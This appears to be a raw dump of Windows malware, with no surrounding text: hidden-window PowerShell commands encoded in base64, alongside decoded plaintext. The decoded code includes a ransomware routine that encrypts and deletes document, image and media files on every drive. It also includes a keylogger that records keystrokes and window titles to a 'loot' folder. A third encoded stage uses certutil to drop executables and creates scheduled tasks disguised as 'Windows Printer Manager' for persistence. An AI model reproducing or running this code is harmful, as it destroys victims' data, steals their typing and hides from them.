AIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAHAAZABmACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgBtAHAANAAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AbQBwADMAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAG0AbwB2ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgBtAGsAdgAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AcABuAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAHAAcwB0ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAY...
$pass=('IwBHAG8ANwBSADcAcABlAGQAQgB5AHcAYQB6AGkAeAAjAA==') $drives = 65..90 | foreach {[char]$_} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.jpg")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.jpeg")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.docx")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.doc")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.xlsx")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.xls")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.ppt")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.pdf")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mp4")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mp3")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mov")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mkv")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}} Invalid character in input stream.
powershell -win hidden -enc IAAkAGwAbwBvAHQAIAA9ACAAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAIAArACAAIgBcAGQAeQBuAGEAXABsAG8AbwB0AFwASwBlAHkAbABvAGcAXAAiACkAOwAgAG0AZAAgACQAbABvAG8AdAAKAGYAdQBuAGMAdABpAG8AbgAgAEQAeQBuAEEAbQBpAHQAZQAtAEsAZQB5ACAAewAkAGQAYQB0AGUAYQBuAGQAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZAAtAEgASAAtAG0AbQA7ACAAJAB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIABIAEgALQBtAG0ACgBBAGQAZAAtAFQAeQBwAGUAIABAACIAIAAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7ACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABVAHMAZQByAFcAaQBuAGQAbwB3AHMAIAB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AIAAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AH0AIAAKACIAQAAKACAAIAAgACAAJABsAG8AZwBmAGkAbABlACAAPQAgACQAbABvAG8AdAAgACsAIAAiAGsAZQB5AGwAbwBnAF8AIgAgACsAIAAiACQAZABhAHQAZQBhAG4AZAB0AGkAbQBlACIAKwAgACIALgBsAG8AZwAiAAoAIAAgACAAIAAkAE0AQQBQAFYASwBfAFYASwBfAFQATwBfAFYAUwBDACAAPQAgADAAeAAwADAACgAJACQATQBBAFAAVgBLAF8AVgBTAEMAXwBUAE8AXwBWAEsAIAA9ACAAMAB4ADAAMQAKAAkAJABNAEEAUABWAEsAXwBWAEsAXwBUAE8AXwBDAEgAQQBSACAAPQAgADAAeAAwADIACgAJACQATQBBAFAAVgBLAF8AVgBTAEMAXwBUAE8AXwBWAEsAXwBFAFgAIAA9ACAAMAB4ADAAMwAKAAkAJABNAEEAUABWAEsAXwBWAEsAXwBUAE8AXwBWAFMAQwBfAEUAWAAgAD0AIAAwAHgAMAA0AAoACQAkAHYAaQByAHQAdQBhAGwAawBjAF8AcwBpAGcAIAA9ACAAQAAnAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAdQB0AG8ALAAgAEUAeABhAGMAdABTAHAAZQBsAGwAaQBuAGcAPQB0AHIAdQBlACkAXQAgAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAcwBoAG8AcgB0ACAARwBlAHQAQQBzAHkAbgBjAEsAZQB5AFMAdABhAHQAZQAoAGkAbgB0ACAAdgBpAHIAdAB1AGEAbABLAGUAeQBDAG8AZABlACkAOwAgAAoAJwBAAAoACQAkAGsAYgBzAHQAYQB0AGUAXwBzAGkAZwAgAD0AIABAACcACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKABiAHkAdABlAFsAXQAgAGsAZQB5AHMAdABhAHQAZQApADsACgAnAEAACgAJACQAbQBhAHAAYwBoAGEAcgBfAHMAaQBnACAAPQAgAEAAJwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBhAHAAVgBpAHIAdAB1AGEAbABLAGUAeQAoAHUAaQBuAHQAIAB1AEMAbwBkAGUALAAgAGkAbgB0ACAAdQBNAGEAcABUAHkAcABlACkAOwAKACcAQAAKAAkAJAB0AG8AdQBuAGkAYwBvAGQAZQBfAHMAaQBnACAAPQAgAEAAJwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVABvAFUAbgBpAGMAbwBkAGUAKAB1AGkAbgB0ACAAdwBWAGkAcgB0AEsAZQB5ACwAIAB1AGkAbgB0ACAAdwBTAGMAYQBuAEMAbwBkAGUALAAgAGIAeQB0AGUAWwBdACAAbABwAGsAZQB5AHMAdABhAHQAZQAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAHAAdwBzAHoAQgB1AGYAZgAsACAAaQBuAHQAIABjAGMAaABCAHUAZgBmACwAIAB1AGkAbgB0ACAAdwBGAGwAYQBnAHMAKQA7AAoAJwBAAAoACQAkAGcAZQB0AEsAZQB5AFMAdABhAHQAZQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHYAaQByAHQAdQBhAGwAawBjAF8AcwBpAGcAIAAtAG4AYQBtAGUAIAAiAFcAaQBuADMAMgBHAGUAdABTAHQAYQB0AGUAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAVABoAHIAdQAKAAkAJABnAGUAdABLAEIAUwB0AGEAdABlACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0ATQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAawBiAHMAdABhAHQAZQBfAHMAaQBnACAALQBuAGEAbQBlACAAIgBXAGkAbgAzADIATQB5AEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAVABoAHIAdQAKAAkAJABnAGUAdABLAGUAeQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG0AYQBwAGMAaABhAHIAXwBzAGkAZwAgAC0AbgBhAG0AZQAgACIAVwBpAG4AMwAyAE0AeQBNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAFQAaAByAHUACgAJACQAZwBlAHQAVQBuAGkAYwBvAGQAZQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHQAbwB1AG4AaQBjAG8AZABlAF8AcwBpAGcAIAAtAG4AYQBtAGUAIAAiAFcAaQBuADMAMgBNAHkAVABvAFUAbgBpAGMAbwBkAGUAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAVABoAHIAdQAKAAkAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADQAMAAKACQAVABvAHAAVwBpAG4AZABvAHcAIAA9ACAAWwBVAHMAZQByAFcAaQBuAGQAbwB3AHMAXQA6ADoARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwAgACQAVwBpAG4AZABvAHcAVABpAHQAbABlACAAPQAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUAIAAtAGUAcQAgACQAVABvAHAAVwBpAG4AZABvAHcAIAB9ACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQAKACQAbABvAG8AdAAgAD0AIAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQAgACsAIAAiAFwAZAB5AG4AYQBcAGwAbwBvAHQAXABLAGUAeQBsAG8AZwBcACIAKQA7ACAAbQBkACAAJABsAG8AbwB0AAkACQAKACQAZwBvAHQAaQB0ACAAPQAgACIAIgAKAAkACQBmAG8AcgAgACgAJABjAGgAYQByACAAPQAgADEAOwAgACQAYwBoAGEAcgAgAC0AbABlACAAMgA1ADQAOwAgACQAYwBoAGEAcgArACsAKQAgAHsAJAB2AGsAZQB5ACAAPQAgACQAYwBoAGEAcgAKAAkACQAJACQAZwBvAHQAaQB0ACAAPQAgACQAZwBlAHQASwBlAHkAUwB0AGEAdABlADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAJAB2AGsAZQB5ACkACgAJAAkAaQBmACAAKAAkAGcAbwB0AGkAdAAgAC0AZQBxACAALQAzADIANwA2ADcAKQAgAHsAJABsAF8AcwBoAGkAZgB0ACAAPQAgACQAZwBlAHQASwBlAHkAUwB0AGEAdABlADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAMQA2ADAAKQAKAAkACQAJAAkAJAByAF8AcwBoAGkAZgB0ACAAPQAgACQAZwBlAHQASwBlAHkAUwB0AGEAdABlADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAMQA2ADEAKQAKAAkACQAJAAkAJABjAGEAcABzAF8AbABvAGMAawAgAD0AIABbAGMAbwBuAHMAbwBsAGUAXQA6ADoAQwBhAHAAcwBMAG8AYwBrAAoACQAJAAkACQAkAHMAYwBhAG4AYwBvAGQAZQAgAD0AIAAkAGcAZQB0AEsAZQB5ADoAOgBNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAJAB2AGsAZQB5ACwAIAAkAE0AQQBQAFYASwBfAFYAUwBDAF8AVABPAF8AVgBLAF8ARQBYACkACgAJAAkACQAJACQAawBiAHMAdABhAHQAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAyADUANgAKAAkACQAJAAkAJABjAGgAZQBjAGsAawBiAHMAdABhAHQAZQAgAD0AIAAkAGcAZQB0AEsAQgBTAHQAYQB0AGUAOgA6AEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKAAkAGsAYgBzAHQAYQB0AGUAKQAKAAkACQAJAAkAJABtAHkAYwBoAGEAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIgA7AAoACQAJAAkACQAkAHUAbgBpAGMAbwBkAGUAXwByAGUAcwAgAD0AIAAkAGcAZQB0AFUAbgBpAGMAbwBkAGUAOgA6AFQAbwBVAG4AaQBjAG8AZABlACgAJAB2AGsAZQB5ACwAIAAkAHMAYwBhAG4AYwBvAGQAZQAsACAAJABrAGIAcwB0AGEAdABlACwAIAAkAG0AeQBjAGgAYQByACwAIAAkAG0AeQBjAGgAYQByAC4AQwBhAHAAYQBjAGkAdAB5ACwAIAAwACkACgAJAAkACQAJAGkAZgAgACgAJAB1AG4AaQBjAG8AZABlAF8AcgBlAHMAIAAtAGcAdAAgADAAKQAgAHsATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGwAbwBnAGYAaQBsAGUAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAbgBpAGMAbwBkAGUAIAAtAEEAcABwAGUAbgBkACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAoACQAdABpAG0AZQAgACsAIAAiACAAIgAgACsAIAAkAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQApACwAIAAkAG0AeQBjAGgAYQByAC4AVABvAFMAdAByAGkAbgBnACgAKQAJAAkACQAJAH0ACQAJAAkAfQAJAAkAfQAJAH0AfQAKAAoARAB5AG4AQQBtAGkAdABlAC0ASwBlAHkAIAAKAA==
$loot = ($env:LOCALAPPDATA + "\dyna\loot\Keylog\"); md $loot function DynAmite-Key {$dateandtime = Get-Date -Format yyyy-MM-dd-HH-mm; $time = Get-Date -Format HH-mm Add-Type @" using System; using System.Runtime.InteropServices; public class UserWindows {[DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow();} "@ $logfile = $loot + "keylog_" + "$dateandtime"+ ".log" $MAPVK_VK_TO_VSC = 0x00 $MAPVK_VSC_TO_VK = 0x01 $MAPVK_VK_TO_CHAR = 0x02 $MAPVK_VSC_TO_VK_EX = 0x03 $MAPVK_VK_TO_VSC_EX = 0x04 $virtualkc_sig = @' [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); '@ $kbstate_sig = @' [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); '@ $mapchar_sig = @' [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); '@ $tounicode_sig = @' [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); '@ $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru while ($true) {Start-Sleep -Milliseconds 40 $TopWindow = [UserWindows]::GetForegroundWindow(); $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle $loot = ($env:LOCALAPPDATA + "\dyna\loot\Keylog\"); md $loot $gotit = "" for ($char = 1; $char -le 254; $char++) {$vkey = $char $gotit = $getKeyState::GetAsyncKeyState($vkey) if ($gotit -eq -32767) {$l_shift = $getKeyState::GetAsyncKeyState(160) $r_shift = $getKeyState::GetAsyncKeyState(161) $caps_lock = [console]::CapsLock $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX) $kbstate = New-Object Byte[] 256 $checkkbstate = $getKBState::GetKeyboardState($kbstate) $mychar = New-Object -TypeName "System.Text.StringBuilder"; $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0) if ($unicode_res -gt 0) {Out-File -FilePath $logfile -Encoding Unicode -Append -InputObject ($time + " " + $WindowTitle), $mychar.ToString() } } }}} DynAmite-Key
powershell -win hidden -enc JABsAG8AbwB0ACAAPQAgACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACAAKwAgACIAXABkAHkAbgBhAFwAIgApADsAIABtAGQAIAAkAGwAbwBvAHQACgBjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAcgBlAHMALgBjAHIAdAAgACgAJABsAG8AbwB0ACAAKwAgACIAcgBlAHMAIgApADsAIABjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAawBsAC4AYwByAHQAIAAoACQAbABvAG8AdAAgACsAIAAiAGsAbAAuAGUAeABlACIAKQA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHMAdAAuAGMAcgB0ACAAKAAkAGwAbwBvAHQAIAArACAAIgBzAHQALgBlAHgAZQAiACkAOwAgACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAGMAcgB5AC4AYwByAHQAIAAoACQAbABvAG8AdAAgACsAIAAiAGMAcgB5AC4AZQB4AGUAIgApADsAIABjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAdAAxAC4AYwByAHQAIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAB0ADEALgB4AG0AbAAiACkAOwAgAGMAZQByAHQAdQB0AGkAbAAgAC0AZABlAGMAbwBkAGUAIAB0ADIALgBjAHIAdAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQAMgAuAHgAbQBsACIAKQA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHQAMwAuAGMAcgB0ACAAKAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAiAFwAdAAzAC4AeABtAGwAIgApADsAIABjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAdAA0AC4AYwByAHQAIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAB0ADQALgB4AG0AbAAiACkAOwAgAGMAZQByAHQAdQB0AGkAbAAgAC0AZABlAGMAbwBkAGUAIAB0ADUALgBjAHIAdAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQANQAuAHgAbQBsACIAKQA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAGIAZAAuAGMAcgB0ACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBkAC4AZQB4AGUACgBzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AYwByAGUAYQB0AGUAIAAvAFQATgAgACIATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFAAcgBpAG4AdABlAHIAIABNAGEAbgBhAGcAZQByAFwAMQAiACAALwBYAE0ATAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQAMQAuAHgAbQBsACIAKQAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwBjAHIAZQBhAHQAZQAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAAyACIAIAAvAFgATQBMACAAKAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAiAFwAdAAyAC4AeABtAGwAIgApAAoAcwBjAGgAdABhAH